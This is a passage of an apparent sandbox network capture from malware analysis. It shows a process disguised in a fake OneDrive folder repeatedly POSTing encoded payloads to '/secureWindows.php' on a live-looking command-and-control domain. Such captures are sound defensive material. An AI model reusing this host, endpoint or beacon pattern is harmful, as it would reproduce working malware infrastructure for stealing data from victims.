                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KObgl4QmbroCbH7%2F0%2BhEhNL8VcZkX1Ej35GYFt9MroXVT0ZyWY4jroWMfxEwd0YwoxiBfVRAiKCvTNX56sXKbCBfoxtGEPwnPf%2B2I8cT8m9RiYotfAKWP4%2Fg1eyqI3pdW9dvJSAPPw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0860842477f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1622&delivery_rate=912413&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 28 16 2c 50 24 33 32 1e 3c 2f 25 5e 28 3d 36 5c 33 31 20 5c 26 02 0c 5e 3c 05 23 58 29 0a 05 00 3c 22 30 10 21 26 2c 5e 29 3b 2f 46 0c 10 24 07 27 32 23 1e 3f 55 3d 59 29 28 24 04 34 30 39 04 2a 5f 37 1d 21 0d 06 1d 30 31 0c 54 38 03 2a 1e 2d 36 32 58 2e 20 2f 0b 3e 3a 21 57 08 14 22 58 25 2f 23 1b 31 03 02 5e 25 0c 08 5b 23 01 09 10 36 2b 2a 5b 3c 3b 34 11 32 0e 20 5e 24 33 27 1c 32 29 3b 06 3c 1f 30 0d 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W(,P$32</%^(=6\31 \&^<#X)<"0!&,^);/F$'2#?U=Y)($409*_7!01T8*-62X. />:!W"X%/#1^%[#6+*[<;42 ^$3'2);<0'3"R. V2XS0
                                                        Oct 30, 2024 05:22:56.672540903 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.674607038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.677349091 CET | 936 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KObgl4QmbroCbH7%2F0%2BhEhNL8VcZkX1Ej35GYFt9MroXVT0ZyWY4jroWMfxEwd0YwoxiBfVRAiKCvTNX56sXKbCBfoxtGEPwnPf%2B2I8cT8m9RiYotfAKWP4%2Fg1eyqI3pdW9dvJSAPPw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0860842477f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1622&delivery_rate=912413&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 28 16 2c 50 24 33 32 1e 3c 2f 25 5e 28 3d 36 5c 33 31 20 5c 26 02 0c 5e 3c 05 23 58 29 0a 05 00 3c 22 30 10 21 26 2c 5e 29 3b 2f 46 0c 10 24 07 27 32 23 1e 3f 55 3d 59 29 28 24 04 34 30 39 04 2a 5f 37 1d 21 0d 06 1d 30 31 0c 54 38 03 2a 1e 2d 36 32 58 2e 20 2f 0b 3e 3a 21 57 08 14 22 58 25 2f 23 1b 31 03 02 5e 25 0c 08 5b 23 01 09 10 36 2b 2a 5b 3c 3b 34 11 32 0e 20 5e 24 33 27 1c 32 29 3b 06 3c 1f 30 0d 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W(,P$32</%^(=6\31 \&^<#X)<"0!&,^);/F$'2#?U=Y)($409*_7!01T8*-62X. />:!W"X%/#1^%[#6+*[<;42 ^$3'2);<0'3"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        57 | 192.168.2.4 | 49794 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:55.263490915 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:55.620784044 CET | 1072 | OUT | Data Raw: 57 5e 59 50 55 5a 56 50 58 57 50 59 55 58 5b 5c 54 5e 5c 5d 59 53 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YPUZVPXWPYUX[\T^\]YSZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]/?+%$.(:4$=_,:+ *\&*++%3!.* F$,Z*=
                                                        Oct 30, 2024 05:22:56.670828104 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.671922922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.672435045 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAbuUgPOV135KbHM%2FtkSXkRZhvYIuWOOPNokOaU8Q7cOWxXKBtHJkshxq%2FfsU2bTd7ol2sK7iwtOK3IRVibpITWxHVldrMuEhMRfQEXMLu6oBNInNH2KfmkFwFEae7Vfrs%2Bb7zIn67k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a086cde64786-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1371212&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:22:56.673002958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.677398920 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAbuUgPOV135KbHM%2FtkSXkRZhvYIuWOOPNokOaU8Q7cOWxXKBtHJkshxq%2FfsU2bTd7ol2sK7iwtOK3IRVibpITWxHVldrMuEhMRfQEXMLu6oBNInNH2KfmkFwFEae7Vfrs%2Bb7zIn67k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a086cde64786-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1371212&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        58 | 192.168.2.4 | 49796 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:56.796577930 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:57.152132034 CET | 1076 | OUT | Data Raw: 57 51 5c 51 55 59 53 51 58 57 50 59 55 5b 5b 5e 54 59 5c 58 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\QUYSQXWPYU[[^TY\XYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/Y?+1$=D:4%=?/*$Z"*X%9$<5)Z0)9 F$,Z*)
                                                        Oct 30, 2024 05:22:57.403933048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:57.615575075 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvrA8R3ZrliE9idusfabyDzgXdMYqez%2F5sAuvgsxY4S3fi%2FV0fE4hDwkBHUh9Angm67iH4P2Sej%2BbIqsF75ma8FpdSExblWtl8DjvqtyaPNqSVtCN2JHbBdckUqQN9SFazfJkdxrppU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0906bb03165-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1261324&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        59 | 192.168.2.4 | 49797 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:57.746654987 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:58.105290890 CET | 1076 | OUT | Data Raw: 52 52 5c 50 55 55 56 55 58 57 50 59 55 5f 5b 53 54 53 5c 5d 59 53 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\PUUVUXWPYU_[STS\]YSZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z8#.]=8X$B:C0\&,8#49(&_#+"3(%- F$,Z*
                                                        Oct 30, 2024 05:22:58.341034889 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:58.538539886 CET | 796 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhAa7sVpkct9rafWJUjsFWmRqRaMGKx1ZPBtvoUvm79LtOJOD%2Bq9lWCAjF%2Bb6qCXJcqMvqvF%2FzteJ6uu7CM%2FDQzoVAtdpF2LV7diGCPpFWm%2BSYrIPXz98%2FCIG86E2tKgYa%2F4Azvz%2BrA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0964be03064-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1048515&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        60 | 192.168.2.4 | 49798 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:58.670756102 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:59.027770996 CET | 1076 | OUT | Data Raw: 57 5f 59 57 50 5a 53 50 58 57 50 59 55 59 5b 58 54 5c 5c 5c 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YWPZSPXWPYUY[XT\\\YSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/?(:'>+B:%$]1?,, )41?%'"-* F$,Z*!
                                                        Oct 30, 2024 05:22:59.258132935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:59.447565079 CET | 798 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EYsPPdEC99Z%2BqNycy2QJ%2FAgaK8SkDkDvcS%2B39FVWIpjiPE%2B%2FzMMZ3B%2BCXPOKu44FyorwBFUVYM%2BuZ%2B3PbjkdMkc8T8exw1ltX6%2FXhBRGvhOxPyiljmCp4ZcV9fRuLWNh1eiKhdzYOw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a09c0cdb2836-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1026222&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        61 | 192.168.2.4 | 49804 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:59.575903893 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:59.933326006 CET | 1076 | OUT | Data Raw: 52 55 59 50 55 55 56 57 58 57 50 59 55 5f 5b 5e 54 5a 5c 5c 59 50 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RUYPUUVWXWPYU_[^TZ\\YPZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\8%?8>['<.3%>/,*<Y4?&94?%6$+6- F$,Z*
                                                        Oct 30, 2024 05:23:00.170702934 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:00.531229019 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lK4Pkz3O9v0iBCXTtzsmVcrCsz5rZ0r2NnSuIH3Ah2h5JGlMth1h3o0ZcFDeLqmQ%2F4HeNasUGE%2BgF659qTZn8PpUiQH6sZ4LLQ7xQDl4rWqzAPJZaqsB2OgNk9b7F%2BAqa1p3u0hRPDM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0a1b84f2cda-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1071005&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        62 | 192.168.2.4 | 49810 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:00.653740883 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:01.012856960 CET | 1076 | OUT | Data Raw: 57 5f 5c 54 50 5d 56 54 58 57 50 59 55 5f 5b 53 54 5b 5c 5d 59 56 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\TP]VTXWPYU_[ST[\]YVZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z,9?(.$.5 Z&=,$ '9']($5[. F$,Z*
                                                        Oct 30, 2024 05:23:01.260462999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:01.569513083 CET | 796 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jeupsWXug56Jl29anCGvK2u%2ByTjdTVW0Fs7r8f14MoGBMmLvQT6OO%2B%2Bwg3j5SQ3cD%2FyqOTnhd8OlfqsJl4%2FCS8eOtVm99%2BDqdSnczqHvy3YmOoQC3O%2Fb4xXXaRMDkU%2F1FALy2PAg1P0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0a88c792ca4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1119010&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        63 | 192.168.2.4 | 49818 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:01.692276001 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        64 | 192.168.2.4 | 49820 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:01.702904940 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:02.058355093 CET | 1076 | OUT | Data Raw: 57 51 5c 55 55 5f 53 52 58 57 50 59 55 5c 5b 5c 54 58 5c 54 59 5c 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\UU_SRXWPYU\[\TX\TY\Z_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\80%+*X':(_&><Z;\8]"*+')+\(%13+9. F$,Z*5
                                                        Oct 30, 2024 05:23:02.297053099 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:02.602619886 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yzc5ZExdv6TBubHTaXSRSiY7zEv4B9FFdjUZ6pgLKs3oVXiCiVAynwoO569ukyLthCjrV6tw%2B1rwzhdKdx16UzBiwD3HXSf2tYONQuzKc9UCwO7QoiMJNaVCZdRNDDO%2FqWHJZPk3NJk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0af0d532e18-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1569&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=965333&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        65 | 192.168.2.4 | 49828 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:02.731684923 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:03.089859009 CET | 1076 | OUT | Data Raw: 57 5f 5c 5d 55 54 56 5c 58 57 50 59 55 50 5b 53 54 5c 5c 58 59 57 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
